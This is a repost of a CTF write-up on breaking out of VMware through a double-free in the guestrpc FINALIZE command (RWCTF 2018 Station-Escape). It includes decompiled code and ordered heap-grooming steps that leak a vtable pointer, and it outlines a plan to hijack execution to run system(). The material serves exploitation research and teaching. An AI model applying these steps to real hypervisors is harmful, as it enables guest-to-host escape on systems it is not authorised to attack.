https://nafod.net/blog/2019/12/21/station-escape-vmware-pwn.html

 

Pwning VMWare, Part 1: RWCTF 2018 Station-Escape

Since December rolled around, I have been working on pwnables related to VMware breakouts as part of my advent calendar for 2019. Advent calendars are a fun way to get motivated to get familiar with a target you’re always putting off, and I had a lot of su

nafod.net

 

The bug

Examining the changes, we find that they’re all in request type 5, corresponding to GUESTRPC_FINALIZE. The user controls the argument which is & 0x21 and passed to guestrpc_close_backdoor.

void __fastcall guestrpc_close_backdoor(__int64 a1, unsigned __int16 a2, char a3) { __int64 v3; // rbx void *v4; // rdi v3 = a1; v4 = *(void **)(a1 + 8); if ( a3 & 0x20 ) { free(v4); } else if ( !(a3 & 0x10) ) { sub_176D90(v3, 0); if ( *(_BYTE *)(v3 + 0x20) ) { vmx_log("GuestRpc: Closing RPCI backdoor channel %u after send completion\n", a2); guestrpc_close_channel(a2); *(_BYTE *)(v3 + 32) = 0; } } }

Control of a3 allows us to go down the first branch in a previously inaccessible manner, letting us free the buffer at a1+0x8, which corresponds to the buffer used internally to store the reply data passed back to the user. However, this same buffer will also be freed with command type 6, GUESTRPC_CLOSE, resulting in a controlled double free which we can turn into use-after-free. (The other patch nop’d out code responsible for NULLing out the reply buffer, which would have prevented this codepath from being exploited.)

Given that the bug is very similar to a traditional CTF heap pwnable, we can already envision a rough path forward, for which we’ll fill in details shortly:

  • Obtain a leak, ideally of the vmware-vmx binary text section
  • Use tcache to allocate a chunk on top of a function pointer
  • Obtain rip and rdi control and invoke system("/usr/bin/xcalc &")

Heap internals and obtaining a leak

Firstly, it should be stated that the vmx heap appears to have little churn in a mostly idle VM, at least in the heap section used for guestrpc requests. This means that the exploit can relatively reliable even if the VM has been running for a bit or if the user was previously using the system.

In order to obtain a heap leak, we’ll perform the following series of operations

  1. Allocate three channels [A], [B], and [C]
  2. Send the info-set commmand to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap.
  3. Open channel [B] and issue a info-get to retrieve the data we just set
  4. Issue the reply length and reply read commands on channel [B]
  5. Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer
  6. Invoke info-get on channel [C] and receive the reply length, which allocates a buffer at the same address we just
  7. Close channel [B], freeing the buffer again
  8. Read out the reply on channel [C] to leak our data

Each vmware-vmx process has a number of associated threads, including one thread per guest vCPU. This means that the underlying glibc heap has both the tcache mechanism active, as well as several different heap arenas. Although we can avoid mixing up our tcache chunks by pinning our cpu in the guest to a single core, we still cannot directly leak a libc pointer because only the main_arena in the glibc heap resides there. Instead, we can only leak a pointer to our individual thread arena, which is less useful in our case.

[#0] Id 1, Name: "vmware-vmx", stopped, reason: STOPPED [#1] Id 2, Name: "vmx-vthread-300", stopped, reason: STOPPED [#2] Id 3, Name: "vmx-vthread-301", stopped, reason: STOPPED [#3] Id 4, Name: "vmx-mks", stopped, reason: STOPPED [#4] Id 5, Name: "vmx-svga", stopped, reason: STOPPED [#5] Id 6, Name: "threaded-ml", stopped, reason: STOPPED [#6] Id 7, Name: "vmx-vcpu-0", stopped, reason: STOPPED <-- our vCPU thread [#7] Id 8, Name: "vmx-vcpu-1", stopped, reason: STOPPED [#8] Id 9, Name: "vmx-vcpu-2", stopped, reason: STOPPED [#9] Id 10, Name: "vmx-vcpu-3", stopped, reason: STOPPED [#10] Id 11, Name: "vmx-vthread-353", stopped, reason: STOPPED . . . .

To get around this, we’ll modify the above flow to spray some other object with a vtable pointer. I came across this writeup by Amat Cama which detailed his exploitation in 2017 using drag-n-drop and copy-paste structures, which are allocated when you send a guestrpc command in the host vCPU heap.

Therefore, I updated the above flow as follows to leak out a vtable/vmware-vmx-bss pointer

  1. Allocate four channels [A], [B], [C], and [D]
  2. Send the info-set commmand to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap.
  3. Open channel [B] and issue a info-get to retrieve the data we just set
  4. Issue the reply length and reply read commands on channel [B]
  5. Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer
  6. Invoke info-get on channel [C] and receive the reply length, which allocates a buffer at the same address we just
  7. Close channel [B], freeing the buffer again
  8. Send vmx.capability.dnd_version on channel [D], which allocates an object with a vtable on top of the chunk referenced by [C]
  9. Read out the reply on channel [C] to leak the vtable pointer

One thing I did notice is that the copy-paste and drag-n-drop structures appear to only allocate their vtable-containing objects once per guest execution lifetime. This could complicate leaking pointers inside VMs where guest tools are installed and actively being used. In a more reliable exploit, we would hope to create a more repeatable arbitrary read and write primtive, maybe with these heap constructions alone. From there, we could trace backwards to leak our vmx binary.

 

'시스템' 카테고리의 다른 글

AFL Fuzzer  (0) 2022.10.22
퍼징으로 1-day 취약점 분석하기(GIMP)  (0) 2022.10.22
Exploiting Null Byte Buffer Overflow for a $40,000 Bounty  (0) 2019.12.26
x64 Stack 개요  (0) 2019.12.11
pwnable.kr (uaf)  (0) 2019.12.11
블로그 이미지

wtdsoul

,